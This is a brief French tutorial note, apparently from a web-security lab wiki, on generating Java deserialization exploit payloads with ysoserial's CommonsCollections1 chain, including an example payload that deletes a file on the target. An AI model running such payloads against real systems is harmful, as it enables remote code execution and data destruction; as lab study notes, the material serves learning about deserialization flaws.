Ysoserial
Pour utiliser Ysoserial, télécharger le sur le repo suivant :
Ensuite basculer sur une version de java inférieur à 12. Prenez la version 8 :
Saisir la commande suivante pour basculer de version après l'installation :
sudo update-alternatives --config java
Enfin saisissez la commande suivante pour générer un payload :
java -jar ysoserial-all.jar CommonsCollections1 'command' | base64
java -jar ysoserial-all.jar CommonsCollections1 'rm /home/carlos/morale.txt' | base64 -w0 #Exemple
Last updated